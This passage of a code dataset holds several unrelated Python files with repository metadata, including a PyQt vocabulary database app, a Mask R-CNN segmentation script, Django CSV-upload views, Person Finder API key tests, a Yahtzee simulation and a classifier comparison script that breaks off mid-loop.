font.setPointSize(12)\n english_word_edit.setFont(font)\n thai_definition_edit.setFont(font)\n english_word_label.setFont(font)\n thai_definition_label.setFont(font)\n\n #create button\n add_button = QPushButton(\"Add to database\")\n add_button.setFont(font)\n\n\n #create layout\n layout = QHBoxLayout()\n layout.addWidget(english_word_label)\n layout.addWidget(english_word_edit)\n layout.addWidget(thai_definition_label)\n layout.addWidget(thai_definition_edit)\n layout.addWidget(add_button)\n popup.setLayout(layout)\n\n #connect to add word button to database\n add_button.clicked.connect(lambda: self.add_word_to_database(popup , item, english_word_edit, thai_definition_edit, dialog, headword))\n\n #show the pop up window\n popup.exec_()\n\n def add_word_to_database(self, popup, item, english_word_edit, thai_definition_edit, dialog, headword):\n # Create a QSqlQuery object to execute SQL queries on the database\n query = QSqlQuery()\n\n # Execute a SQL query to retrieve the ID of the English word, if it already exists in the database\n query.prepare(\"SELECT _id FROM translation WHERE body = :body AND entry_id IN (SELECT _id FROM entry WHERE headword = :headword)\")\n query.bindValue(\":body\", english_word_edit.text())\n query.bindValue(\":headword\", thai_definition_edit.text())\n query.exec_()\n\n # Check if the query returned a result\n if query.next():\n # The English word already exists in the database, show an error message to the user\n QMessageBox.warning(popup, \"Word already exists\", f\"The word '{thai_definition_edit.text()}' already exists in '{english_word_edit.text()}'.\")\n else:\n # The English word does not exist in the database, insert the Thai and English words\n query.prepare(\"INSERT INTO entry (headword) VALUES (:headword)\")\n query.bindValue(\":headword\", thai_definition_edit.text())\n query.exec_()\n self.db.commit()\n\n # Get the ID of the last inserted row in the entry table\n entry_id = query.lastInsertId()\n\n query.prepare(\"INSERT INTO translation (body, entry_id) VALUES (:body,:entry_id)\")\n query.bindValue(\":body\", english_word_edit.text())\n query.bindValue(\":entry_id\", entry_id)\n query.exec_()\n self.db.commit()\n\n print(f\"English word: {english_word_edit.text()}\")\n print(f\"Thai definition: {thai_definition_edit.text()}\")\n print(f\"id: {entry_id}\")\n\n QMessageBox.information(popup, \"Word added\", f\"The word '{english_word_edit.text()}' has been added to the database.\")\n dialog.ui.listWidget.clear()\n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_() \n # headword = None\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n\n\n # Close the dialog\n popup.accept()\n\n \n def delete_word_from_selection(self, dialog, item):\n # Create a QSqlQuery object to execute SQL queries on the database\n query = QSqlQuery()\n\n # Print the selection item in an array\n selected = []\n for i in range(dialog.ui.listWidget.count()):\n item_selected = dialog.ui.listWidget.item(i)\n if item_selected.checkState() == Qt.Checked:\n selected.append(item_selected.text())\n\n # Delete the word from the database\n for i in range(len(selected)):\n query.prepare(\"SELECT _id FROM entry WHERE headword = :headword\")\n query.bindValue(\":headword\", selected[i])\n query.exec_()\n \n if query.next():\n entry_id = query.value(0)\n # print(f\"Deleted {selected[i]}\")\n \n 
query.prepare(\"DELETE FROM entry WHERE _id = :id\")\n query.bindValue(\":id\", entry_id)\n query.exec_()\n self.db.commit()\n query.prepare(\"DELETE FROM translation WHERE entry_id = :id\")\n query.bindValue(\":id\", entry_id)\n query.exec_()\n self.db.commit()\n \n else:\n print(f\"Entry not found for {selected[i]}\")\n\n dialog.ui.listWidget.clear()\n print(\"clear\")\n \n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_()\n \n # Clear the selected list and repopulate the listWidget\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n item_selected = None\n selected = []\n \n\n def reconnect_Eng_data(self, item):\n query = QSqlQuery()\n query.prepare(\"SELECT DISTINCT body from translation\")\n query.exec_()\n self.ui.listWidget.clear()\n while query.next():\n english_word = query.value(0)\n self.ui.listWidget.addItem(english_word)\n\n def add_word_to_favourites(self, dialog, item):\n print(\"_________________________\")\n print(\"add word to favourites\")\n query = QSqlQuery()\n headword = None\n english_word = None\n word_id = None\n temp = None\n \n #execute a SQL query to retrieve data from the database\n query.prepare(\"SELECT entry.headword, translation.body, translation.entry_id FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_()\n print(\"1\")\n\n while query.next():\n headword = query.value(0)\n english_word = query.value(1)\n word_id = query.value(2)\n\n query.prepare(\"SELECT Word FROM favourite WHERE Word = :word\")\n query.bindValue(\":word\", english_word)\n query.exec_()\n\n while query.next():\n temp = query.value(0)\n \n if temp == english_word:\n print(\"You have already added this word to your favourite list\")\n QMessageBox.information(self, \"Sorry :(\", f\"You have already added '{english_word}' to your favourite list.\")\n return\n\n\n if headword is not None:\n print(\"yay!\")\n \n query.prepare(\"INSERT INTO favourite (entry_id,Word) VALUES (:entry_id,:Word)\")\n query.bindValue(\":entry_id\", word_id)\n query.bindValue(\":Word\", english_word)\n query.exec_()\n self.db.commit()\n QMessageBox.information(self, \"Word added\", f\"The word '{english_word}' has been added to the database.\")\n\n else:\n print(\"no!\")\n QMessageBox.information(self, \"Sorry :(\", f\"The word '{english_word}' doesn't have definition.\")\n dialog.accept()\n \n\n\n\n\n","repo_name":"SFocusP/SETL","sub_path":"Code/page_functions/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39466427434","text":"\"\"\"\r\nhttps://debuggercafe.com/instance-segmentation-with-pytorch-and-mask-r-cnn/\r\nhttps://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection\r\n\"\"\"\r\n\r\nimport torch\r\nimport random\r\nfrom PIL import Image\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass InstanceSegmentaion(object):\r\n def __init__(self):\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.img_transforms = transforms.Compose([\r\n transforms.ToTensor(),\r\n ])\r\n self.model = model = 
models.detection.maskrcnn_resnet50_fpn(pretrained=True, num_classes=91)\r\n self.model.to(self.device)\r\n self.model.eval()\r\n self.coco_classes_list = [\r\n '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',\r\n 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', 'N/A', 'stop sign',\r\n 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\r\n 'elephant', 'bear', 'zebra', 'giraffe', 'N/A', 'backpack', 'umbrella', 'N/A', 'N/A',\r\n 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\r\n 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket',\r\n 'bottle', 'N/A', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',\r\n 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\r\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', 'N/A', 'dining table',\r\n 'N/A', 'N/A', 'toilet', 'N/A', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',\r\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'N/A', 'book',\r\n 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'\r\n ]\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n colors = torch.as_tensor([i for i in range(91)])[:, None] * palette\r\n self.colors = (colors % 255).numpy().astype(\"uint8\")\r\n\r\n def predict_numpy(self, image):\r\n return self._predict_numpy(image)\r\n\r\n def _predict_numpy(self, image):\r\n image = Image.fromarray(image)\r\n image_tensor = self.img_transforms(image)\r\n image_tensor = image_tensor.unsqueeze(0)\r\n image_tensor = image_tensor.to(self.device)\r\n masks, boxes, labels = self._get_outputs(image_tensor)\r\n output = self._draw_segmentation_map(image, masks, boxes, labels)\r\n return output\r\n\r\n def _get_outputs(self, image, threshold=0.95):\r\n with torch.no_grad():\r\n outputs = self.model(image)\r\n scores = list(outputs[0]['scores'].detach().cpu().numpy())\r\n thresholded_preds_inidices = [scores.index(i) for i in scores if i > threshold]\r\n thresholded_preds_count = len(thresholded_preds_inidices)\r\n masks = (outputs[0]['masks']>0.5).squeeze().detach().cpu().numpy()\r\n masks = masks[:thresholded_preds_count]\r\n boxes = [[(int(i[0]), int(i[1])), (int(i[2]), int(i[3]))] for i in outputs[0]['boxes'].detach().cpu()]\r\n boxes = boxes[:thresholded_preds_count]\r\n labels = [self.coco_classes_list[i] for i in outputs[0]['labels']]\r\n return masks, boxes, labels\r\n\r\n def _draw_segmentation_map(self, image, masks, boxes, labels):\r\n alpha = 1 \r\n beta = 0.6\r\n gamma = 0\r\n for i in range(len(masks)):\r\n red_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n green_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n blue_map = np.zeros_like(masks[i]).astype(np.uint8)\r\n color = self.colors[random.randrange(0, len(self.colors))]\r\n red_map[masks[i] == 1], green_map[masks[i] == 1], blue_map[masks[i] == 1] = color\r\n segmentation_map = np.stack([red_map, green_map, blue_map], axis=2)\r\n image = np.array(image)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n cv2.addWeighted(image, alpha, segmentation_map, beta, gamma, image)\r\n cv2.rectangle(image, boxes[i][0], boxes[i][1], color=tuple(color.tolist()), \r\n thickness=2)\r\n cv2.putText(image , labels[i], (boxes[i][0][0], boxes[i][0][1]-10), \r\n cv2.FONT_HERSHEY_SIMPLEX, 1, tuple(color.tolist()), \r\n thickness=2, lineType=cv2.LINE_AA)\r\n return image\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image_path = 'test.jpg'\r\n kjn = 
InstanceSegmentaion()\r\n image = cv2.imread(image_path)\r\n output = kjn.predict_numpy(image)\r\n cv2.imshow(\"dupa.jpg\", output)\r\n cv2.waitKey(0)\r\n","repo_name":"kornellewy/youtube-collection","sub_path":"czym_jest_segmentacja_oraz_jak_jej_używać/instance_seg.py","file_name":"instance_seg.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20714353884","text":"import unittest\nimport json\nfrom app.src.services.example_service_two import ServiceTwo\n\n\nclass TestServiceTwo(unittest.TestCase):\n\n def test_post_method_request_and_response(self):\n obj = ServiceTwo()\n jsonmsg = '{\"name\":\"Jeet\"}'\n data = json.loads(jsonmsg)\n\n output = obj.service_method(data)\n\n assert isinstance(json.loads(output), dict)\n\n\n# if __name__ == '__main__':\n# unittest.main()\n","repo_name":"jitendra-github-lab/flask-blueprint-framework","sub_path":"ds-arch-type/{{cookiecutter.project_name}}/app_tests/units/TestServiceTwo.py","file_name":"TestServiceTwo.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14857798935","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.http import HttpResponse\r\nfrom django.template import loader\r\nfrom .models import Question\r\nfrom django.core.files.storage import FileSystemStorage # 파일저장\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\ndef CSV(request):\r\n if request.method == 'POST':\r\n try:\r\n col_li = []\r\n total_data_li = []\r\n file = request.FILES['fileInput']\r\n fs = FileSystemStorage()\r\n filename = fs.save(\"파일명.csv\", file)\r\n try:\r\n dfs = pd.read_csv(\"C:/Users/user/mysite/파일명.csv\",encoding = 'ansi').head(5)\r\n except:\r\n dfs = pd.read_csv(\"C:/Users/user/mysite/파일명.csv\",encoding = 'utf-8').head(5)\r\n \r\n os.remove(\"C:/Users/user/mysite/파일명.csv\")\r\n df_len = len(dfs)\r\n columns = dfs.columns\r\n\r\n for i in columns:\r\n col_li.append(i)\r\n\r\n for i in range(df_len):\r\n data_li = []\r\n for j in columns:\r\n data_li.append(dfs.loc[i,j])\r\n total_data_li.append(data_li)\r\n \r\n\r\n return render(request,'polls/index.html',{'result':col_li,\"data\":total_data_li,\"file\": file})\r\n except:\r\n return render(request,'polls/index.html') \r\n\r\n return render(request,'polls/index.html')\r\n\r\n\r\ndef CSV2(request):\r\n if request.method == 'POST':\r\n\r\n file_name = request.POST['hidden_name']\r\n\r\n col_li = request.POST['columns']\r\n col_li = col_li.lstrip(\"[\")\r\n col_li = col_li.rstrip(\"]\")\r\n col_li = col_li.replace(\"'\" , \"\")\r\n col_li = col_li.split(\", \")\r\n\r\n total_data_li = request.POST['datas']\r\n total_data_li = total_data_li[1:len(total_data_li)-1]\r\n total_data_li = total_data_li.split(\"], \")\r\n\r\n\r\n new_data_li = []\r\n for i in total_data_li:\r\n elements = i + \"]\"\r\n elements = elements.lstrip(\"[\")\r\n elements = elements.rstrip(\"]\")\r\n elements = elements.replace(\"'\",\"\")\r\n elements = elements.split(\", \")\r\n new_data_li.append(elements)\r\n\r\n exclusive_list = []\r\n\r\n df = pd.DataFrame(new_data_li, columns = col_li)\r\n \r\n for i in col_li:\r\n exclusive_num = request.POST[i]\r\n if exclusive_num == \"1\":\r\n booleans = True\r\n else:\r\n booleans = False\r\n exclusive_list.append(booleans)\r\n \r\n df = df.loc[:, exclusive_list]\r\n\r\n df_len = len(df)\r\n columns = df.columns\r\n\r\n updated_col_li = []\r\n\r\n for i 
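# The per-class colour table built in __init__ above multiplies each label
# index by a fixed palette and folds the result into 0-254 per channel; the
# same trick in plain numpy:
import numpy as np

palette = np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])
colors = (np.arange(91)[:, None] * palette % 255).astype('uint8')
print(colors[1])  # the RGB triple assigned to class index 1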
in columns:\r\n updated_col_li.append(i)\r\n\r\n\r\n updated_total_data_li = []\r\n\r\n for i in range(df_len):\r\n data_li = []\r\n for j in updated_col_li:\r\n data_li.append(df.loc[i,j])\r\n updated_total_data_li.append(data_li)\r\n\r\n\r\n return render(request,'polls/index.html',{'result':col_li,\"data\":new_data_li,\"updated_col_li\":updated_col_li,\"updated_total_data_li\":updated_total_data_li,\"file\":file_name})\r\n return render(request,'polls/index.html') \r\n","repo_name":"Junior1Jun/DJango---Python","sub_path":"2022-11-22 장고 views.py","file_name":"2022-11-22 장고 views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36360564040","text":"import django.http\n\nimport model\n\nimport view_tests_base\n\n\nclass ApiKeyListViewTests(view_tests_base.ViewTestsBase):\n \"\"\"Tests the admin API keys list view.\"\"\"\n\n def setUp(self):\n super(ApiKeyListViewTests, self).setUp()\n self.data_generator.repo()\n self.authorization = self.data_generator.authorization()\n self.login_as_superadmin()\n\n def test_get(self):\n \"\"\"Tests GET requests.\"\"\"\n doc = self.to_doc(self.client.get(\n '/haiti/admin/api_keys/list/', secure=True))\n self.assertTrue('Bob Vance' in doc.text)\n self.assertTrue('bob@fridge.com' in doc.text)\n self.assertTrue('Vance Refrigeration' in doc.text)\n # The first 10 elements with the \"permissions\" class are the\n # \"Permissions\" header and the individual permissions column headers.\n permissions_row = [el.text for el in doc.cssselect('.permission')[10:]]\n expected_permissions = [\n 'fridge.com', 'x', 'x', 'x', None, None, None, None, 'x']\n self.assertEqual(permissions_row, expected_permissions)\n\n\nclass ApiKeyManagementViewTests(view_tests_base.ViewTestsBase):\n \"\"\"Tests the API key management view.\"\"\"\n\n def init_testbed_stubs(self):\n self.testbed.init_user_stub()\n self.testbed.init_datastore_v3_stub()\n\n def setUp(self):\n super(ApiKeyManagementViewTests, self).setUp()\n self.login_as_superadmin()\n\n def test_get_create_form(self):\n \"\"\"Tests GET requests with no log key (i.e., the creation form).\"\"\"\n self.authorization = self.data_generator.authorization()\n res = self.client.get('/haiti/admin/api_keys/', secure=True)\n self.assertEqual(res.context['target_key'],\n model.Authorization.DEFAULT_SETTINGS)\n self.assertEqual(res.context['operation_type'], 'create')\n\n def test_get_update_form(self):\n \"\"\"Tests GET requests with a log key specified (i.e., an update form).\n \"\"\"\n self.authorization = self.data_generator.authorization()\n management_log = model.ApiKeyManagementLog(\n repo='haiti',\n api_key=self.authorization.api_key,\n action=model.ApiKeyManagementLog.CREATE,\n ip_address='123.45.67.89',\n key_state=self.authorization.summary_str())\n management_log.put()\n res = self.client.get(\n '/haiti/admin/api_keys/',\n data={'log_key': management_log.key()},\n secure=True)\n self.assertEqual(res.context['target_key'].key(),\n self.authorization.key())\n self.assertEqual(res.context['operation_type'], 'update')\n\n def test_post_render_update_form(self):\n \"\"\"Tests POST requests to show the update form.\"\"\"\n self.authorization = self.data_generator.authorization()\n params = {\n 'edit_form': '1',\n 'authorization_key': self.authorization.key(),\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True)\n 
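# The nested try/except in CSV() above falls back from one CSV encoding to
# another; the same idea reads more cleanly as a loop (path and encodings
# here are illustrative):
import pandas as pd

def read_csv_any(path, encodings=('utf-8', 'cp1252')):
    last_err = None
    for enc in encodings:
        try:
            return pd.read_csv(path, encoding=enc)
        except UnicodeDecodeError as err:
            last_err = err
    raise last_err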
self.assertEqual(res.context['target_key'].key(),\n self.authorization.key())\n self.assertEqual(res.context['operation_type'], 'update')\n\n def test_create_key(self):\n \"\"\"Tests POST requests to create a new key.\"\"\"\n params = {\n 'contact_name': 'Creed Bratton',\n 'contact_email': 'creed@aol.com',\n 'organization_name': 'Creed Inc.',\n 'read_permission': 'true',\n 'search_permission': 'true',\n 'is_valid': 'true',\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True,\n REMOTE_ADDR='11.22.33.44')\n # Check that the Authorization entity was generated correctly.\n auths = model.Authorization.all().filter('repo =', 'haiti')\n self.assertEqual(auths.count(), 1)\n auth = auths[0]\n self.assertEqual(auth.contact_name, 'Creed Bratton')\n self.assertEqual(auth.contact_email, 'creed@aol.com')\n self.assertEqual(auth.organization_name, 'Creed Inc.')\n self.assertTrue(auth.read_permission)\n self.assertTrue(auth.search_permission)\n self.assertTrue(auth.is_valid)\n self.assertIsNone(auth.domain_write_permission)\n self.assertFalse(auth.full_read_permission)\n self.assertFalse(auth.subscribe_permission)\n self.assertFalse(auth.mark_notes_reviewed)\n self.assertFalse(auth.believed_dead_permission)\n self.assertFalse(auth.stats_permission)\n self.assertIsInstance(res, django.http.HttpResponseRedirect)\n # A management log entry should have been created.\n management_logs = model.ApiKeyManagementLog.all()\n self.assertEqual(1, management_logs.count())\n management_log = management_logs[0]\n self.assertEqual(management_log.repo, 'haiti')\n self.assertEqual(management_log.api_key, auth.api_key)\n self.assertEqual(\n management_log.action, model.ApiKeyManagementLog.CREATE)\n self.assertEqual(management_log.ip_address, '11.22.33.44')\n self.assertTrue('Creed' in management_log.key_state)\n # The user should be redirected to the form with the log key in a GET\n # parameter.\n self.assertEqual(\n res.url,\n 'https://testserver/haiti/admin/api_keys?repo=haiti&log_key=%s' %\n management_log.key())\n\n def test_update_key(self):\n \"\"\"Tests POST request to update an existing key.\"\"\"\n self.authorization = self.data_generator.authorization()\n params = {\n 'key': self.authorization.key(),\n 'contact_name': 'Phyllis Vance',\n 'contact_email': 'phyllis@fridge.com',\n 'organization_name': 'Vance Refrigeration',\n 'domain_write_permission': 'fridge.com',\n 'read_permission': 'true',\n 'full_read_permission': 'true',\n 'search_permission': 'true',\n 'subscribe_permission': 'true',\n 'is_valid': 'true',\n 'xsrf_token': self.xsrf_token('admin_api_keys'),\n }\n res = self.client.post(\n '/haiti/admin/api_keys/', data=params, secure=True,\n REMOTE_ADDR='11.22.33.44')\n # Check that the Authorization entity was updated correctly.\n auths = model.Authorization.all().filter('repo =', 'haiti')\n self.assertEqual(auths.count(), 1)\n auth = auths[0]\n self.assertEqual(auth.key(), self.authorization.key())\n # Check that changes were made.\n self.assertEqual(auth.contact_name, 'Phyllis Vance')\n self.assertEqual(auth.contact_email, 'phyllis@fridge.com')\n self.assertTrue(auth.subscribe_permission)\n # A management log entry should have been created.\n management_logs = model.ApiKeyManagementLog.all()\n self.assertEqual(1, management_logs.count())\n management_log = management_logs[0]\n self.assertEqual(management_log.repo, 'haiti')\n self.assertEqual(management_log.api_key, auth.api_key)\n self.assertEqual(\n management_log.action, 
model.ApiKeyManagementLog.UPDATE)\n self.assertEqual(management_log.ip_address, '11.22.33.44')\n self.assertTrue('Phyllis' in management_log.key_state)\n # The user should be redirected to the form with the log key in a GET\n # parameter.\n self.assertEqual(\n res.url,\n 'https://testserver/haiti/admin/api_keys?repo=haiti&log_key=%s' %\n management_log.key())\n","repo_name":"google/personfinder","sub_path":"tests/views/test_admin_api_keys.py","file_name":"test_admin_api_keys.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"18884543261","text":"from itertools import chain\n\nlines = open('input').read().splitlines()\n\no = lines[0].split(',')\nboards = [\n [l.split() for l in b]\n for b in zip(*[lines[i::6] for i in range(2, 7)])\n]\n\n\ndef score(board):\n return min(score_rows(board), score_rows(list(zip(*board))))\n\n\ndef score_rows(board):\n steps = min(max(o.index(num) for num in row) for row in board)\n score = sum(int(num) for num in chain(*board) if o.index(num) > steps) * int(o[steps])\n return steps, score\n\n\n# Part 1\nprint(min(map(score, boards)))\n\n# Part 2\nprint(max(map(score, boards)))\n","repo_name":"matus-pikuliak/advent_2021","sub_path":"04/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43030949030","text":"# Yahtzee_template.py\n# Created by David C. Tuttle\n# Last modified: April 2, 2018\n\nimport random\nimport collections\n\nNUM_SIDES = 6 # Number of sides on each die\nNUM_DICE = 5 # Number of dice in the game\nNUM_ROLLS = 3 # Number of rolls for each test\nNUM_TESTS = 1000 # Number of tests to perform\n\n# ***** Definition of Die object class and methods go here ***\n\n# PART I - DEFINING THE DIE CLASS goes here\nclass Die():\n def __init__(self, number_of_sides):\n self.side_num = number_of_sides\n self.rolled = 0\n\n def roll(self):\n self.rolled = random.randint(1, self.side_num)\n\n def value(self):\n return self.rolled\n\n# ***** End of Die class definition **************************\n\n# list of Die objects -> boolean\n# expects a list of Die objects\n# returns True if all values of the Die objects match (a \"Yahtzee\")\n# returns False otherwise\n\ndef is_yahtzee(the_dice):\n result = True\n for i in range(1, NUM_DICE):\n if the_dice[i].value() != the_dice[i-1].value():\n result = False\n return result\n\n# list of Die objects -> nothing\n# expects a list of Die objects\n# returns nothing\n# side effect: prints to screen the values on the dice\n\ndef print_dice(the_dice):\n print(\"The dice values are: {0}\".format([i.value() for i in the_dice]))\n\n# list of Die objects -> int\n# expects a list of Die objects\n# examines the values of the dice, and determines which value\n# is most common\n# returns that most common value found\n# Examples: the_dice values of [1, 5, 4, 5, 5] will return 5\n# the_dice values of [2, 6, 2, 6, 4] will return 2 or 6\n\ndef best_value_to_keep(the_dice):\n # Create a counter dictionary of the values in the_dice[]\n dice_counter = collections.Counter(i.value() for i in the_dice)\n \n # Look for the greatest number of dice that match each other\n how_many_dice_match = max(dice_counter.values())\n \n # Find which value on the dice (that is, which key in the counter)\n # corresponds to how_many_dice_match (if a tie, either value is OK)\n for i in list(dice_counter.keys()):\n if dice_counter[i] == 
how_many_dice_match:\n            value_to_keep = i\n    \n    # value_to_keep is now the most commonly found value on the dice\n    return value_to_keep\n\n# *************** play_yahtzee code goes here ********************\n\n# list of Die objects -> boolean\n# expects a list of Die objects\n# Rolls the dice NUM_ROLLS times to try to get a \"Yahtzee\"\n# A Yahtzee is when all the dice have the same value\n# returns True if a Yahtzee occurs, or False otherwise\n#\n# side effect: prints to the screen the values of the dice\n#              (by calling print_dice(the_dice)) after each roll,\n#              and a single-line \"Yahtzee\" or \"No Yahtzee\" message at the end\n\n# PART II - Writing the play_yahtzee function goes here\n\ndef play_yahtzee(the_dice):\n    for i in range(0, NUM_DICE):\n        the_dice[i].roll()\n\n    print_dice(the_dice)\n    num_rolled = 1\n\n    while(num_rolled < NUM_ROLLS and not is_yahtzee(the_dice)):\n        for i in range(0, NUM_DICE):\n            if(the_dice[i].value() != best_value_to_keep(the_dice)):\n                the_dice[i].roll()\n        print_dice(the_dice)\n        num_rolled += 1\n\n    if is_yahtzee(the_dice):\n        print(\"Yahtzee!\")\n    else:\n        print(\"No yahtzee... :c\")\n    return is_yahtzee(the_dice)\n\n# *************** end play_yahtzee code **************************\n\n# *** The \"main\" code to run play_yahtzee() NUM_TESTS times goes here ***\n\n# PART III - Code to run play_yahtzee multiple times goes here\n\nthe_dice = []\n\nfor i in range(0, NUM_DICE):\n    the_dice.append(Die(NUM_SIDES))\n\n# Now, write a loop to call play_yahtzee(the_dice) NUM_TESTS times.\n# Use a local variable to keep track of the\n# number of Yahtzees that occur, and compute the percentage of\n# tests that resulted in a Yahtzee. Print the number of tests,\n# the number of Yahtzees, and the percentage of success\n# to the screen in an easy to read and understand manner\nnum_yahtzees = 0\nfor i in range(0,NUM_TESTS):\n    if play_yahtzee(the_dice):\n        num_yahtzees +=1\n\nprint(num_yahtzees, \"yahtzees out of\", NUM_TESTS)\nprint(\"{:.0%} success rate!\".format(num_yahtzees / NUM_TESTS))\n\n# *** End of \"main\" code ***\n","repo_name":"EliLPeters/Spring-2018-Schoolwork","sub_path":"CS 232 Python/Homework/CS232-04-elp5.py","file_name":"CS232-04-elp5.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6902758779","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nimport seaborn as sns\nfrom collections import Counter, defaultdict\nfrom minepy import MINE\nimport pandas as pd\nimport operator\nimport datetime\nimport time\nfrom sklearn.preprocessing import MinMaxScaler\nfrom itertools import combinations\nfrom sklearn.metrics import mutual_info_score\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import svm\nfrom sklearn import tree\n\ndef prepare_data(dataset,proportion):\n    label = dataset[:,-1]\n    data = dataset[:,:-1]\n\n    n_class = len(set(label))\n\n    shuffle_index = np.arange(len(label))\n    np.random.shuffle(shuffle_index)\n\n    train_number = int(proportion * len(label))\n    train_index = shuffle_index[:train_number]\n    #print(train_index)\n    val_index = shuffle_index[train_number:]\n    #print(val_index)\n    return train_index,val_index\n\n\n\n
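# Load the whitespace-delimited dataset; the last column holds the class label.\n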
X = np.loadtxt('统计的数据集/整理好的数据集/adult(1).txt')\n\n\nm=X.shape[1]-1\nvector_data=X[:,:-1]\nlabel_data=X[:,-1]\n\n# Discretize each feature into 8 bins; the *_NBC arrays feed the tree-based models\narray1 = np.zeros(shape = (0, X.shape[0]))\nfor n in range(0, m):\n    k = 8\n    d1 = pd.cut(vector_data[:, n], k, labels = range(k))\n    array1 = np.vstack((array1, d1))\narray1 = np.vstack((array1, label_data))\nX1 = array1.T\n\n#print(X)\n#print(X1)\nvector_data_NBC = X1[:, :-1]\nlabel_data_NBC = X1[:, -1]\n\nvector_data_RVFL=X[:,:-1]\nlabel_data_RVFL=X[:,-1]\n\ntrain_accuracy_svc=[]\ntest_accuracy_svc=[]\n\ntrain_accuracy_NN=[]\ntest_accuracy_NN=[]\n\ntrain_accuracy_NB=[]\ntest_accuracy_NB=[]\n\ntrain_accuracy_cart=[]\ntest_accuracy_cart=[]\n\ntrain_accuracy_rt=[]\ntest_accuracy_rt=[]\n\nfor k in range(0, 1):\n    train_index, val_index = prepare_data(X, 0.7)\n    train_data_NBC = vector_data_NBC[train_index]\n    train_label_NBC = label_data_NBC[train_index]\n    test_data_NBC = vector_data_NBC[val_index]\n    test_label_NBC = label_data_NBC[val_index]\n\n    train_data_RVFL = vector_data_RVFL[train_index]\n    train_label_RVFL = label_data_RVFL[train_index]\n    test_data_RVFL = vector_data_RVFL[val_index]\n    test_label_RVFL = label_data_RVFL[val_index]\n\n    # Support vector machine\n    clf=svm.SVC()\n    clf.fit(train_data_RVFL,train_label_RVFL)\n    temp=0\n    correct=0\n    Predict_Matrix_test=clf.predict(test_data_RVFL)\n    for i in range(len(test_label_RVFL)):\n        if Predict_Matrix_test[i]==test_label_RVFL[i]:\n            correct+=1\n    test_accuracy_svc.append(correct/len(test_label_RVFL))\n\n    correct=0\n    Predict_Matrix_train=clf.predict(train_data_RVFL)\n    for i in range(len(train_label_RVFL)):\n        if Predict_Matrix_train[i]==train_label_RVFL[i]:\n            correct+=1\n    train_accuracy_svc.append(correct/len(train_label_RVFL))\n    print(test_accuracy_svc,train_accuracy_svc)\n\n\n\n\n    # Neural network (MLP)\n    clf = MLPClassifier(hidden_layer_sizes = (500,), activation = 'relu',\n                        solver = 'lbfgs', alpha = 0.0001, batch_size = 'auto',\n                        learning_rate = 'constant')\n    clf.fit(train_data_RVFL,train_label_RVFL)\n\n    temp=0\n    correct=0\n    Predict_Matrix_test=clf.predict(test_data_RVFL)\n    for i in range(len(test_label_RVFL)):\n        if Predict_Matrix_test[i]==test_label_RVFL[i]:\n            correct+=1\n    test_accuracy_NN.append(correct/len(test_label_RVFL))\n\n    correct=0\n    Predict_Matrix_train=clf.predict(train_data_RVFL)\n    for i in range(len(train_label_RVFL)):\n        if 